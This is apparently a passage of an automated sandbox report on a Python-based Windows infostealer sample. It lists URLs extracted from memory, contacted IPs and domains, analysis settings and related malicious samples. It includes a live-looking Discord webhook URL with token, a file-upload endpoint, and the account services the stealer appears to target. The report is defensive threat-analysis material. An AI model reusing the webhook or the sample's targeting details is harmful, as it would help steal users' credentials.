                                                                              http://github.com/ActiveState/appdirs322pVOVprx.exe, 00000001.00000003.344669679.0000023E95765000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355652962.0000023E95798000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350317626.0000023E95789000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345603847.0000023E95775000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.371492201.0000023E95D20000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.348047116.0000023E95786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://wiki.debian.org/XDGBaseDirectorySpecification#state322pVOVprx.exe, 00000001.00000003.347809627.0000023E9570C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349051665.0000023E95718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://wwwsearch.sf.net/):322pVOVprx.exe, 00000001.00000003.359301387.0000023E96970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://tiktok.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    low
                                                                                    https://bugs.python.org/issue44497.322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://origin.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      low
                                                                                      https://telegram.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      low
                                                                                      https://riotgames.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      low
                                                                                      https://canary.discord.com/api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKl322pVOVprx.exe, 00000001.00000003.360977811.0000023E967D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://playstation.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      low
                                                                                      https://packaging.python.org/specifications/entry-points/322pVOVprx.exe, 00000001.00000002.373655740.0000023E96440000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/jaraco/jaraco.functools/issues/5322pVOVprx.exe, 00000001.00000002.373364941.0000023E96220000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://pornhub.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          low
                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py322pVOVprx.exe, 00000001.00000003.362948790.0000023E93ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm322pVOVprx.exe, 00000001.00000003.307927048.0000023E95F3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307927048.0000023E95EC8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307987697.0000023E95F42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.rfc-editor.org/info/rfc7253322pVOVprx.exe, 00000001.00000003.355166441.0000023E96B6B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343437448.0000023E96B6A000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.360590071.0000023E96B6B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://bugs.python.org/issue23606)322pVOVprx.exe, 00000001.00000003.348086365.0000023E969B2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340388146.0000023E969B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf322pVOVprx.exe, 00000001.00000003.353001105.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347749361.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343563449.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.358820202.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355166441.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356087969.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359464370.0000023E96B5D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349238498.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.360590071.0000023E96B5E000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362209360.0000023E96B5E000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344775176.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357019176.0000023E96B48000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357019176.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.322pVOVprx.exe, 00000001.00000002.374418147.0000023E96922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://packaging.python.org/installing/322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://steam.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        low
                                                                                                        http://google.com/322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354100842.0000023E968C7000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339805348.0000023E9689F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356593337.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340079077.0000023E961F5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349566837.0000023E9614D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349070461.0000023E968BD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96847000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344522145.0000023E96136000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340931205.0000023E960C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.342101286.0000023E960D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356264962.0000023E968C8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339344619.0000023E961F4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E9683B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359054877.0000023E96173000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349804130.0000023E96170000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353060804.0000023E96172000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E9684D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://mahler:8092/site-updates.py322pVOVprx.exe, 00000001.00000003.357442719.0000023E96855000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96847000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374418147.0000023E96922000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E9683B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96848000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353952021.0000023E96854000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E96855000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374217692.0000023E96856000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          low
                                                                                                          https://api.gofile.io/getServerr322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tools.ietf.org/html/rfc5869322pVOVprx.exe, 00000001.00000002.374679366.0000023E96B90000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339187150.0000023E96B8B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357206780.0000023E95E63000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95E3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B81000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354683376.0000023E95E4F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E95E41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/psf/black322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.python.org/download/releases/2.3/mro/.322pVOVprx.exe, 00000001.00000003.301375405.0000023E95733000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.301438496.0000023E95733000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.369427040.0000023E952D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html322pVOVprx.exe, 00000001.00000003.339187150.0000023E96B8B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357929607.0000023E95FA4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353001105.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349409786.0000023E9682C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347749361.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353795266.0000023E9682C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343563449.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.358820202.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355166441.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95E3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B81000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.372881830.0000023E95FA7000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374540168.0000023E96A06000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356087969.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339726671.0000023E95FA2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354683376.0000023E95E4F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359464370.0000023E96B5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://httpbin.org/post322pVOVprx.exe, 00000001.00000003.362660689.0000023E96888000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374277035.0000023E96888000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339805348.0000023E96887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://discordapp.com/api/v6/users/322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cdn.discordapp.com/attachments/1050492593114456124/1051490320921145384/786713106658492416.we322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/Ousret/charset_normalizer322pVOVprx.exe, 00000001.00000003.348277479.0000023E967E2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349409786.0000023E96822000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355469303.0000023E96824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.firmaprofesional.com/cps0322pVOVprx.exe, 00000001.00000003.356246607.0000023E96C07000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374708837.0000023E96C0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referral322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://docs.python.org/3/library/re.html#re.sub322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309324212.0000023E95FF5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309324212.0000023E95FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://raw.githubusercontent.com/pypa/setuptools/main/docs/images/banner-640x320.svg322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2322pVOVprx.exe, 00000001.00000002.373788241.0000023E96540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://yahoo.com/322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356593337.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340079077.0000023E961F5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96847000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339344619.0000023E961F4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E9683B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E9684D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96848000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373306892.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359522305.0000023E961FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular322pVOVprx.exe, 00000001.00000003.360078794.0000023E95AF1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344669679.0000023E957A4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352292036.0000023E95FD4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347985009.0000023E95FB2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E95FAC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370175258.0000023E957DA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347844833.0000023E957AD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349323854.0000023E957B5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352559577.0000023E95AF1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345409708.0000023E95F25000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343024871.0000023E95A05000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.372718665.0000023E95F2D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349356307.0000023E957B9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353103508.0000023E957CA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347147894.0000023E95F2B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350749759.0000023E95FC0000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344269479.0000023E95ECF000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349928799.0000023E957C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339992640.0000023E957A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6322pVOVprx.exe, 00000001.00000003.357641194.0000023E9620D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345942222.0000023E9620B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340079077.0000023E961F5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.358346646.0000023E9620D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339344619.0000023E961F4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373318168.0000023E9620D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://w3c.github.io/html/sec-forms.html#multipart-form-data322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344522145.0000023E96136000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340931205.0000023E960C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.342101286.0000023E960D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340131521.0000023E960B1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373245305.0000023E96145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://github.com/pyparsing/pyparsing/wiki322pVOVprx.exe, 00000001.00000003.355028166.0000023E95F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://epicgames.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          low
                                                                                                                                          https://youtube.com)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          low
                                                                                                                                          https://github.com/pypa/setuptools/issues322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://img.shields.io/badge/code%20style-black-000000.svg322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://sellix.io)z322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              low
                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs
                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              162.159.137.232
                                                                                                                                              unknownUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              104.237.62.211
                                                                                                                                              api4.ipify.orgUnited States
                                                                                                                                              18450WEBNXUSfalse
                                                                                                                                              162.159.128.233
                                                                                                                                              canary.discord.comUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              64.185.227.155
                                                                                                                                              unknownUnited States
                                                                                                                                              18450WEBNXUSfalse
                                                                                                                                              159.89.102.253
                                                                                                                                              geolocation-db.comUnited States
                                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                              51.38.43.18
                                                                                                                                              api.gofile.ioFrance
                                                                                                                                              16276OVHFRfalse
                                                                                                                                              173.231.16.76
                                                                                                                                              unknownUnited States
                                                                                                                                              18450WEBNXUSfalse
                                                                                                                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                              Analysis ID:806836
                                                                                                                                              Start date and time:2023-02-14 04:49:11 +01:00
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 6m 6s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Number of analysed new started processes analysed:4
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample file name:322pVOVprx.exe
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal64.troj.spyw.winEXE@6/78@12/7
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              HDC Information:
                                                                                                                                              • Successful, ratio: 98.1% (good quality ratio 84.2%)
                                                                                                                                              • Quality average: 63.6%
                                                                                                                                              • Quality standard deviation: 34.5%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                              • Number of executed functions: 43
                                                                                                                                              • Number of non-executed functions: 68
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 209.197.3.8
                                                                                                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                              No simulations
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              162.159.137.232f023.exeGet hashmaliciousBrowse
                                                                                                                                                CC Checker AcTeam.exeGet hashmaliciousBrowse
                                                                                                                                                  Urgent Price request P.O 1672891 And Images (ITF).exeGet hashmaliciousBrowse
                                                                                                                                                    MT CHEMITEC V2302 - AGENT APPOINTMENT.exeGet hashmaliciousBrowse
                                                                                                                                                      IALTNT22021-001.exeGet hashmaliciousBrowse
                                                                                                                                                        Oxzy.exeGet hashmaliciousBrowse
                                                                                                                                                          MV BELLIGHT DISCH ABT 46982 MTS OF SOYABEANS IN BULK FORMAL AGENCY APPOINTMENT_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            Creal.exeGet hashmaliciousBrowse
                                                                                                                                                              uBZeAVcb6r.exeGet hashmaliciousBrowse
                                                                                                                                                                e-dekont-20230127.exeGet hashmaliciousBrowse
                                                                                                                                                                  E2C31090339C37FAF04CE2489EA35E9E22844B5AEF1A0.exeGet hashmaliciousBrowse
                                                                                                                                                                    KPCPU-231.exeGet hashmaliciousBrowse
